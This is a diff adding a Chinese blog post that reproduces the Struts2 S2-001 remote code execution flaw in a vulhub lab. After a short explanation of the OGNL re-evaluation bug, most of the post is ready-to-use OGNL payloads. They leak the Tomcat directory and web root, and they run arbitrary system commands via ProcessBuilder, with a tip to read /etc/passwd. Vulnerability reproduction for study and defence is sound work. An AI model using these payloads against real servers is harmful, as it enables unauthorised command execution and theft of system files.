--- a/source/_posts/S2-001-远程代码执行漏洞.md
+++ b/source/_posts/S2-001-远程代码执行漏洞.md
@@ -1,6 +1,42 @@
 ---
 title: S2-001 远程代码执行漏洞
 date: 2020-07-27 21:48:24
-categories:
-tags:
+categories: 漏洞复现
+tags: struts2
 ---
+
+#### 背景
+
+该漏洞因为用户提交表单数据并且验证失败时，后端会将用户之前提交的参数值使用 OGNL 表达式 %{value} 进行解析，然后重新填充到对应的表单数据中。例如注册或登录页面，提交失败后端一般会默认返回之前提交的数据，由于后端使用 %{value} 对提交的数据执行了一次 OGNL 表达式解析，所以可以直接构造 Payload 进行命令执行。
+
+<!--more-->
+
+#### 获取tomcat执行路径
+
+```java
+%{"tomcatBinDir{"+@java.lang.System@getProperty("user.dir")+"}"}
+```
+
+![](http://cdn.laohuan.art/2020-07-27_21-31-50.png)
+
+#### 获取Web路径：
+
+```java
+%{#req=@org.apache.struts2.ServletActionContext@getRequest(),#response=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),#response.println(#req.getRealPath('/')),#response.flush(),#response.close()}
+```
+
+![](http://cdn.laohuan.art/2020-07-27_21-33-14.png)
+
+#### 任意命令执行
+
+```
+%{#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"pwd","/etc/passwd"})).redirectErrorStream(true).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),#f.getWriter().println(new java.lang.String(#e)),#f.getWriter().flush(),#f.getWriter().close()}
+```
+
+![](http://cdn.laohuan.art/2020-07-27_21-37-08.png)
+
+通过改变`new java.lang.String[]{"cat","/etc/passwd"}`来执行任意命令
+
+#### 参考链接
+
+<https://github.com/vulhub/vulhub/blob/master/struts2/s2-001/README.zh-cn.md/>
